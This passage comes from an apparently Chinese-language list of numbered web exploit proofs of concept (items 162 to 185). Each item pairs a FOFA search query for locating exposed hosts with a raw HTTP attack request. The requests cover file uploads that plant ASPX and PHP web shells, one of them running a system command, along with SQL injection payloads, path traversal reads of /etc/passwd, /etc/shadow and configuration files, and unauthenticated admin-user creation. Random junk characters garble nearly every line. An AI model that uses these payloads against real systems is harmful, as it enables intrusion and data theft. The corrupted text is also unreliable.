1 g' g5 R D( X<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
- b u3 w/ `; c) n0 P<tag>3</tag>
U9 v& B- D* c- ~2 e# s' s</UploadResume>
5 T+ n$ \$ ~; ^% M( v# }</soap:Body>+ h8 Y4 n5 D" X9 t+ H
</soap:Envelope>
! B5 |# R" ~$ Q2 ^6 J
$ g( k$ N$ G0 J) `# L5 i. r
1 Z6 ^1 w% I3 o/ X$ vhttp://x.x.x.x/dizxdell.aspx L0 \+ ?0 H$ x. _) g
& q; _3 s3 @- M0 e' D162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
1 b, p$ N' n' E9 D r8 @6 }FOFA: app="和丰山海-数字标牌"' C0 O" [" O' N. p+ L' d$ j' i
POST /QH.aspx HTTP/1.19 I7 C. D6 p; e# H
Host: x.x.x.x
8 ]$ S5 {$ s/ z" k# r; F7 iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
9 y5 ?2 x; v4 xConnection: close
& K/ A. E+ h: T3 {, p6 zContent-Length: 583
$ s# D6 f( c$ hContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
8 E* Y+ r/ u8 L! E/ u' tAccept-Encoding: gzip& e3 U' _# C/ W
. Z0 k& a4 G6 S" o7 H% r7 |( ^------WebKitFormBoundaryeegvclmyurlotuey
4 o/ x* f3 J& o$ _ L1 SContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
) C2 l4 |4 y5 N C& tContent-Type: application/octet-stream, r% H8 S, e3 H, v! L% y
) F8 T5 P. [0 v- x( t+ L<% response.write("ujidwqfuuqjalgkvrpqy") %>0 H4 u! L8 v, }( ^4 N3 @/ ]# [7 f
------WebKitFormBoundaryeegvclmyurlotuey( U# r' V" c0 d
Content-Disposition: form-data; name="action"
* X4 G$ S2 m3 t7 P( j7 o( `$ n4 u* ~6 Y6 q
upload* @4 g( a: @% h9 h) l# G8 q
------WebKitFormBoundaryeegvclmyurlotuey
4 {. G- Y! }% h OContent-Disposition: form-data; name="responderId"
4 E1 x8 x9 B b% L
: I8 O1 Z# b# `9 RResourceNewResponder" b4 U9 _) q0 T0 e# x
------WebKitFormBoundaryeegvclmyurlotuey2 g' d/ H: E; W6 F. [9 e
Content-Disposition: form-data; name="remotePath"" O& E# p C3 T, F) D Q' y5 y
( q5 w( p6 ?" t/opt/resources
- D$ Q7 K, R9 ]0 o7 ^9 y------WebKitFormBoundaryeegvclmyurlotuey--6 E6 K R+ F3 F
/ B" ^# Z% l6 P+ [* @6 I4 O9 S* A$ m8 a5 f$ D' o( B
http://x.x.x.x/opt/resources/kjuhitjgk.aspx8 {' n7 n7 p8 j1 @5 x. U3 @
) a6 y' E6 Y. L1 o163. 号卡极团分销管理系统 ue_serve.php 任意文件上传! |3 @# S, Z" F u. T# b$ ~# Z! a
FOFA: icon_hash="-795291075"
: h0 R# l" @, o7 T1 ^3 n4 qPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
) Y! H' Z* B8 [Host: x.x.x.x4 t( I1 K, B8 j, {3 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
! S: m/ M, E, | v5 d9 Y% V* CConnection: close; y, k! @4 h, R( M; g
Content-Length: 293
& `) C+ _; _& H8 I2 dAccept: */*
, }3 L& G9 w/ v. uAccept-Encoding: gzip, deflate
, p, D4 x6 `* P. eAccept-Language: zh-CN,zh;q=0.9+ q- @- Q/ x {9 G. o/ {. y
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
# w& H0 ?9 t) ^
1 m( z k( e8 _0 G/ ?5 t. D3 b% E------iiqvnofupvhdyrcoqyuujyetjvqgocod
- c3 W( b" u+ F& z& m7 ^- d& v2 ?Content-Disposition: form-data; name="name"
/ b7 o6 Q8 y: I! h6 D/ G% t B: K; b8 R( w* m
1.php
/ d8 E4 I6 u/ P- ?0 R+ ^( s------iiqvnofupvhdyrcoqyuujyetjvqgocod% r; D( }0 n- x& _# x, [6 v
Content-Disposition: form-data; name="upfile"; filename="1.php"3 P; U* P9 H) Z* T2 }2 @
Content-Type: image/jpeg
% R- g6 L* X7 m: h i) _$ e+ ]- }2 j9 ^) P4 x
rvjhvbhwwuooyiioxega) |4 h8 c1 k) J$ u
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
0 `- H$ M/ B# J6 ?7 N
s. H+ d$ X( i$ D8 y# w8 [& y; b" B; j, e0 F8 {1 \) g$ X
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传1 \$ E# X8 q9 f$ L
FOFA: title="智慧综合管理平台登入". \+ [+ P+ S, ~6 f7 S: t
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
: W( y6 V+ D" \- z1 _. SHost: x.x.x.x
, G" t; m9 g3 r/ C& [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' r# V0 ?8 u# c: x: b
Content-Length: 288
, q% g- n; q. a+ R4 lAccept: application/json, text/javascript, */*; q=0.01
4 E [" ^* b5 D% h/ HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,) s7 X: i- T# I$ g# G, Y* c
Connection: close2 J: c9 M7 l* f
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl( `- y6 }) O3 N, N* n% y* o
X-Requested-With: XMLHttpRequest
( Z+ E" @6 q- a$ @Accept-Encoding: gzip2 @; k& F; A6 o' E$ h- ^! e
+ q t0 @( `8 I. b# c% p% {------dqdaieopnozbkapjacdbdthlvtlyl
5 W9 B! @, c4 u# UContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"0 t) G! [ O3 ]4 G3 e: K- V
Content-Type: image/jpeg
+ |5 v' j/ j! j6 `, P# A" O' x+ e$ J) L/ w% V- c- S9 i" ~- q
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>( Y7 a z. y% x4 k: @
------dqdaieopnozbkapjacdbdthlvtlyl--
. X' O* ~( S8 E7 l0 w, t$ z2 e$ g; U5 p
: [- l$ [1 u* y5 u( h i
" H; O# | Y* z5 _9 {7 f2 ?http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
2 L. f. L) p% t$ C1 a% N& T: s! K5 S" ^) _5 c6 N- r1 Y
165. OrangeHRM 3.3.3 SQL 注入- n4 r0 y9 p+ \3 @
CVE-2024-36428
8 u/ R( f1 s A+ A0 LFOFA: app="OrangeHRM-产品"' U( H @1 i! d5 l& X# `
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))4 a" m6 a6 I2 X* {
- z4 o9 R( n! _7 ~, _/ u5 s' s) @& ~2 I' g+ p; \4 u/ g# r3 G7 Y0 H: C
166. 中成科信票务管理平台SeatMapHandler SQL注入+ W J+ _2 E3 x% e
FOFA:body="技术支持:北京中成科信科技发展有限公司"* `3 K2 M# `3 ^1 x& c
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1# `3 N3 L5 H) O$ ]
Host:$ E1 K/ K) d. I
Pragma: no-cache; k- R$ {8 s( c& [% ?$ y
Cache-Control: no-cache
4 R4 {+ D$ v! M8 A' w$ i$ N8 Q" SUpgrade-Insecure-Requests: 1$ j# b* s G, @/ K, W+ a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
' z6 }# Q; E9 GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 n/ \) m, y9 _* F0 r
Accept-Encoding: gzip, deflate, i, [3 u0 n1 A2 t1 a5 _
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8* e, j5 K- U+ V3 ~
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
+ } j. H& \ K' XConnection: close4 Y( [' L1 i* E( [) j9 a
Content-Type: application/x-www-form-urlencoded
/ a/ N& L! v! j; hContent-Length: 895 t8 a% {& u/ L/ }+ q
: \9 ^; O$ p7 R- ~( @, S+ G' W) `
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE1 ^6 t& Y; v p3 j8 z* C/ K$ R
! O: M$ y0 ^; a7 r
! [4 v& Q7 Q- Q' {# P! z+ x0 c167. 精益价值管理系统 DownLoad.aspx任意文件读取6 L1 q, u, K0 u/ G9 _5 d
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"2 t& X& r" A! L3 q$ i
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
$ a' Q: m' a8 a2 iHost:2 |" ~$ r A1 u9 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' `1 a" N9 n3 J
Content-Type: application/x-www-form-urlencoded# S: F0 J; X6 H# {, u& k
Accept-Encoding: gzip, deflate( ?+ f, Q, F. ]" m( B" O
Accept: */*+ c; {5 S( I* g* ^! @4 @* E0 T# J
Connection: keep-alive
r/ k0 \6 ~' w& z
4 s5 K! {% Q' T* J/ o, h
3 n" k+ y, I6 u1 `% }168. 宏景EHR OutputCode 任意文件读取
* D6 M: I1 w/ e1 R) d# X9 HFOFA:app="HJSOFT-HCM"! p& O: D, M3 g
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
& H% }. F+ r* W0 g) q! R* BHost: your-ip; F5 g p; e H3 M7 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.361 g- _4 l( ?- w6 D" c7 h/ U% P5 t
Content-Type: application/x-www-form-urlencoded' d" ^0 w! @0 q5 b3 l' q! A' n
Connection: close
" B$ H$ e* B0 L
8 B2 G9 M* H) u$ |& {* M5 X
3 k7 H, ~0 b7 S
5 R3 T! _/ G$ Z: K169. 宏景EHR downlawbase SQL注入8 `! Q) c: K7 ^
FOFA:app="HJSOFT-HCM"
! \0 s5 g9 Q1 b( ^GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1' ?0 ^/ ^' A& S$ O5 R2 n. l
Host: your-ip
6 c; `; N! L% n( x. j" kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
a2 s1 I1 [ N2 ?/ D. PAccept: */*
6 Z" B4 P8 k1 @& ]% p6 bAccept-Encoding: gzip, deflate
* O v) x& d1 N5 EConnection: close
+ W6 m# D4 t* j
+ }$ Z( n. S+ K6 c6 e4 |
% ?6 X' ~ s( |- U: Y0 ~( P6 J' Z: g
9 p! m O- ^2 \170. 宏景EHR DisplayExcelCustomReport 任意文件读取; b2 D6 ?6 @+ j; k
FOFA:body="/general/sys/hjaxmanage.js"
+ M8 C. a1 T( O/ F" K+ dPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.12 c" I0 ?* Z7 ]1 k: D) w
Host: balalanengliang0 _0 K+ u; @( i8 s6 K6 k6 }/ [
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! Y/ w6 k+ z' o( N! q4 E/ t, E" EContent-Type: application/x-www-form-urlencoded2 |# J3 w* r9 E+ c' q/ G7 F4 [
4 C" h+ S* j, h" i) Rfilename=../webapps/ROOT/WEB-INF/web.xml/ S( \' m: H- M. D) w- L9 t9 D
: T" {+ d, k, z/ t
- a" Y. A: }& Q# U& d3 p! ^4 ^/ z
171. 通天星CMSV6车载定位监控平台 SQL注入
- X4 N: s# O. c( l. YFOFA:body="/808gps/"
& a, a+ R& m' V( [! i/ NGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1& d2 p) V' N2 d4 D
Host: your-ip0 `( A# G+ U: {8 ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
* ~! u: D. M, I+ qAccept: */*
Y. g0 R2 |1 ?) f, d/ f7 rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) x/ j; X; q- u4 P8 }/ m
Accept-Encoding: gzip, deflate
) j2 \ |* W& X; _* b9 M5 c' _, }Connection: close% f" j$ I; B: M3 ~" n* R. E) @
$ p2 R9 |: p# a# Y) b" E+ H" k# X% H
+ O! w3 b0 S; \" R
172. DT-高清车牌识别摄像机任意文件读取
: X: F. K- ~9 s7 Q# L8 l' m3 ?FOFA:app="DT-高清车牌识别摄像机"
. ?0 K* I7 u3 ~$ F( zGET /../../../../etc/passwd HTTP/1.1& v$ H" L6 T5 }+ t2 K# a2 c
Host: your-ip+ f$ o6 s7 I( j% G) w5 [& i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 {; f7 w: D! K$ p* _
Accept-Encoding: gzip, deflate
' n) V# h: c. W$ x9 s6 D; YAccept: */*& D0 }5 r v: I3 b
Connection: keep-alive* ^" y5 Z- z$ A% x! L9 P
- g& \! {' N- v' w4 N' ^
4 j& O; X9 t2 `( X! p( |0 m! M2 l! Q* _* K
173. Check Point 安全网关任意文件读取
$ c& o& w _. x# Q* T0 zCVE-2024-24919# d. ~# S( `1 l8 R
FOFA:app="Check_Point-SSL-Network-Extender"
* F4 c. D3 A+ v z. u2 VPOST /clients/MyCRL HTTP/1.1
( H+ F) {$ r. lHost: your-ip; v9 e, O! B/ r4 r0 ?) [8 Q
Content-Type: application/x-www-form-urlencoded$ D8 ^3 m* N3 A. I8 O7 X
/ ?4 s/ v! G- _# W7 QaCSHELL/../../../../../../../etc/shadow
' S! i$ D- J$ J0 Y$ K+ h
$ n5 P* Z0 x9 E# {
3 i2 H$ T7 N! e0 Q* h2 F# t8 o' b
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
9 u6 E1 h8 }/ ~1 l! Y7 |FOFA:app="金和网络-金和OA"+ p4 Q# B5 D/ s, c. S
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
9 u' K, J) e$ o2 Y9 [2 ^& e- hHost: your-ip
) E8 s$ E& @6 l* I6 iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.362 Q: A' c9 @: h- Z% S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! U8 i6 V, V1 w5 t/ w3 qAccept-Encoding: gzip, deflate, br
6 N( }* M$ y% _. n+ T% I! GAccept-Language: zh-CN,zh;q=0.9
. }& x6 a7 v1 N" c8 C% Y( ]Connection: close9 E; V# r) k, @2 W: m( @8 [
/ E7 [4 ~, Y9 Y, Z7 q3 ?; e1 [5 [: |: }1 N4 q* p1 |% w& w
5 V, w; m" c; l! }
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入3 E& |- \ g5 g( A1 }5 D; E
FOFA:app="金和网络-金和OA"
: @- G' @: ]3 [! F" VGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1, ]& x$ ~/ R7 J6 k
Host:' ?' d! g( w4 m3 W
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36* s. \4 r* s: Q5 ?1 ?- { G: {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, n2 h6 V' L( m- SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: ]7 Q x0 {" a3 `4 A
Accept-Encoding: gzip, deflate
2 J' H# @% T: I( s) XConnection: close9 X5 C! n1 E% F+ \8 |1 o
Upgrade-Insecure-Requests: 1
& v2 T7 y% S: ^' p8 r7 {, H1 x2 D+ b+ Z
! R) p; o9 X z
176. 电信网关配置管理系统 rewrite.php 文件上传- r r7 u, z( c: r4 s3 U
FOFA:body="img/login_bg3.png" && body="系统登录"
0 h1 |: j: l: v4 Q" RPOST /manager/teletext/material/rewrite.php HTTP/1.1
( j- L K: Y+ c/ Y' l' fHost: your-ip/ D5 ~% u# G6 x0 ~( ?0 P0 M1 t% t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" M+ B+ m0 Z% k/ D; v) `0 `8 ^3 C
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT: ]. V: T2 k! n6 _9 e
Connection: close0 o+ @4 z. ~" G' H! m- p
" `" E$ Q$ Y$ f4 [8 {) N
------WebKitFormBoundaryOKldnDPT m: R* A6 U9 @* U7 w
Content-Disposition: form-data; name="tmp_name"; filename="test.php"! x- q2 V1 I0 @) j/ z1 G6 d" N. E ~
Content-Type: image/png5 p0 m& @( q$ @. ]0 U* x
) _* T- p) `- C' z<?php system("cat /etc/passwd");unlink(__FILE__);?>8 _* E5 u, ]/ x
------WebKitFormBoundaryOKldnDPT
0 T9 C6 [. r, R5 `Content-Disposition: form-data; name="uploadtime") V+ b7 _; K8 [6 s# @; |6 ?2 u) X
6 \. n" l* \3 b; p$ `( N3 C4 H/ A . A0 c% {8 S6 y% B8 [( x6 v
------WebKitFormBoundaryOKldnDPT--6 d- S Q0 P7 \
, Z, x6 j$ q& u& n; q$ Q
* E! }: g4 H# F) z! a/ k- x7 [" H$ V" |9 ?5 o# X
177. H3C路由器敏感信息泄露
" ]9 V9 P; W$ |8 Z% R/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/ Q k h* m' _# a: p/userLogin.asp/../actionpolicy_status/../M60.cfg
0 [' s# d) { T% W: j- s' s/userLogin.asp/../actionpolicy_status/../GR8300.cfg# n; F. g# H9 e2 W* O4 ?% I
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
4 s' C: H* X4 p# q8 ?' Z+ L4 b/userLogin.asp/../actionpolicy_status/../GR3200.cfg7 H6 O3 h9 k! t3 @# B' k: d0 j8 J
/userLogin.asp/../actionpolicy_status/../GR2200.cfg' S) w% v: V3 v; r
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg4 m( V8 `# J% B* }
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
! e! F' ]: `9 h' z/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
: V/ Q2 V, u, n' z+ q/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg+ K* T, Z/ O: u6 a) d
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
5 n4 c$ y2 J: a+ K- J! j$ t& w" W/userLogin.asp/../actionpolicy_status/../ER5100.cfg
+ }0 B5 Z; d; Y1 D/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg8 C: ?: v1 S! c" \. E
/userLogin.asp/../actionpolicy_status/../ER3260.cfg$ X1 Z! `5 A, X
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
: n C3 L; s# O5 i! I! _3 W/userLogin.asp/../actionpolicy_status/../ER3200.cfg' H( d/ Q- K% P7 X, K% L) P2 o
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
) k( y5 B E) g6 B( l! W: v/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
3 L& X+ |: `5 V5 \' O, d' I, m/ D/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg; L- f" j% e/ P' f% @
/userLogin.asp/../actionpolicy_status/../ER3100.cfg4 M- I, l! T# r9 t
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
9 B! n+ R( s1 r
. c4 D% E! }: u& w" c0 S$ R3 m/ T; M2 |3 Q: f" j
178. H3C校园网自助服务系统-flexfileupload-任意文件上传' k1 w' }8 J' t8 ^6 h# H( |2 n/ X
FOFA:header="/selfservice"' ~% [3 |" A# c9 I, C
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1. U/ t8 u# f6 N9 o2 h1 V7 G9 y n
Host:
( r6 y7 u7 W! B/ O! e4 E5 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
& |" o+ ?) h8 _+ H! P, RContent-Length: 252- `1 r% l3 Z8 B0 u% a- P
Accept-Encoding: gzip, deflate8 M2 _, k' r" z9 Q: H
Connection: close
! \ T+ }8 a" u. J* v# N3 TContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l$ a2 P" b+ S9 ^* h
-----------------aqutkea7vvanpqy3rh2l/ j. |4 e; \. v. ?5 G* C
Content-Disposition: form-data; name="12234.txt"; filename="12234"
" y2 W% U9 C9 K U* Y7 U& XContent-Type: application/octet-stream
1 ?0 l; C9 K b, M3 MContent-Length: 255/ G! f7 z% T8 }
+ o# _# q: Y/ L5 ^8 M12234$ d8 I* m ~! ^ m2 O& Z+ g
-----------------aqutkea7vvanpqy3rh2l--! O; C5 P. Q) N$ |0 J6 d
: k# F, |$ X" l% T7 C: ^
. Q) S. ?5 y3 m, nGET /imc/primepush/%2e%2e/flex/12234.txt& L4 x* D; Q( L! |$ ]& o3 A
! c6 |- K. W2 g2 {8 ^' X3 A7 H# g7 K& w% O' ?$ q/ O
179. 建文工程管理系统存在任意文件读取5 b. {/ w5 n. ]* j
POST /Common/DownLoad2.aspx HTTP/1.12 u9 L2 g9 w5 m# I3 m
Host: {{Hostname}}
9 }# Z& Y/ A5 x$ }! N9 K+ nContent-Type: application/x-www-form-urlencoded& q3 U7 m1 U4 \1 R2 P% W
User-Agent: Mozilla/5.0
% r, G* i% o8 E3 H o2 _" B0 T4 k
7 {- \4 h6 M+ Upath=../log4net.config&Name=7 i7 z1 A) n" n1 v4 ]/ N
) _! r$ d% A a$ a( k3 I
' ], ?8 k7 A: ?) l; }9 L180. 帮管客 CRM jiliyu SQL注入1 H# v- e! M/ h# Q* ]/ U
FOFA:app="帮管客-CRM"
+ j- C' Y" x j2 K8 aGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
2 n. F" L# G% Y/ @, c+ }" c; ]$ THost: your-ip L e1 y6 G) O: k; ~5 d: a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. M6 a a2 v% }& X7 X1 B6 K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ I- r- G; C1 Z* n3 O
Accept-Encoding: gzip, deflate
( s1 v% k* M0 ?$ yAccept-Language: zh-CN,zh;q=0.9
& H1 J! H( Q) B/ ]+ D1 w% [! t: w- tConnection: close
6 f" _4 k6 A& k. a. l3 G& [$ ?. K8 }/ }8 K$ `
! ?& ]! B5 N1 k% S; W181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
" v+ p( Z: r4 Q+ \1 ]+ D3 xFOFA:"PDCA/js/_publicCom.js") Z2 o7 n) _/ X, s; m' T, U
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
/ {- S5 F9 P$ n0 T$ s. }Host: your-ip) a: A8 \" @- p- X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.363 a# l/ ]( A% q2 Z: c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) x: L" i# Q$ Y @/ D7 }6 ?
Accept-Encoding: gzip, deflate, br
8 V& v0 K* t" L/ M9 ?1 O: m+ EAccept-Language: zh-CN,zh;q=0.9( k) P1 |( _1 o/ J; ]- N
Connection: close
( l2 S' D' y, AContent-Type: application/x-www-form-urlencoded
: v/ l$ S: {# X4 m( c4 L/ } p @" V8 [1 m
4 u3 ?, l1 J" O0 @action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20& i& S% m& @1 D
7 p% m9 y, B! b
0 V6 _! c% D5 Q6 F; a. ?182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
6 m; ?7 w- X# T5 ^2 x- S7 M4 _& yFOFA:"PDCA/js/_publicCom.js"
/ b( p5 x+ F' t+ M0 B8 ^. D }( RPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
4 Q% d2 b* E% x+ b aHost: your-ip9 Y3 N# Y; S( t' z- @8 c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
1 Q& {" }8 I% p7 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 Y+ O# @! o- ?) V9 @
Accept-Encoding: gzip, deflate, br
# ^6 e `: J5 Y+ gAccept-Language: zh-CN,zh;q=0.9. H- p, c" `( `8 G2 R9 |# K7 H
Connection: close
, o% S' _& f1 ^; B" u) gContent-Type: application/x-www-form-urlencoded
1 ?$ |$ F7 Y/ Z( _1 I( P
; {2 P, P0 a4 d8 @; g, M% J8 v# F. a$ u; ]6 }& k+ ^2 e
username=test1234&pwd=test1234&savedays=1; [7 _' L9 U* p
5 H* w% i- _4 a1 f) b2 d+ |# k$ E- j& q9 e. t8 T9 n& q
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
% ?- _. _ w, p; _: D+ y7 ZFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
# y# Q# J$ I2 \GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.15 ^5 G$ a4 ^) b' m0 n6 i
Host: your-ip
& G" Q- V0 U* J8 K, vUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
# ~) c5 B( h$ z5 R6 P$ R0 b7 z" yAccept-Charset: utf-8
8 Y) ]* G# G+ e$ y( R" vAccept-Encoding: gzip, deflate
a% i4 o6 U( C1 a) M0 kConnection: close( E# b6 l& ]# Q
6 p8 V4 | g3 ~7 F, D9 f
9 o" Z' r" z! [1 O5 y$ B1 t- A184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加$ |% l' p7 E1 Q0 J, q' |
FOFA:server="SunFull-Webs"
% I- q3 g$ [2 e/ jPOST /soap/AddUser HTTP/1.1( t& ^$ C0 `- V6 O7 u7 c& \- S5 R+ c! E
Host: your-ip+ C: E B& T% B# G$ A# P
Accept-Encoding: gzip, deflate. J. j8 s) Z( Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
9 C; V8 ?6 A& m; GAccept: application/xml, text/xml, */*; q=0.01/ c( B4 ?( q/ ^& ~
Content-Type: text/xml; charset=utf-8
* o$ D+ X, N5 ~" x7 F( h. D8 lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! N8 q( j* c1 j6 k V) {( `1 A
X-Requested-With: XMLHttpRequest& k/ q2 J+ v) u: i* U$ }
& y+ n) n; z, J+ c; q- T6 h. _
7 ^7 A6 @" W% R4 S5 y1 y$ oinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
" z. A/ \) y% O& L- Z/ Z4 O2 P; L+ h) x+ B
* i6 A5 u- Q _# a+ S185. 瑞友天翼应用虚拟化系统SQL注入6 D2 ~1 b0 N, {7 Q$ w/ i
version < 7.0.5.1
0 ~( D1 }& L- A5 R( nFOFA:app="REALOR-天翼应用虚拟化系统"% ~! N2 l$ b/ s
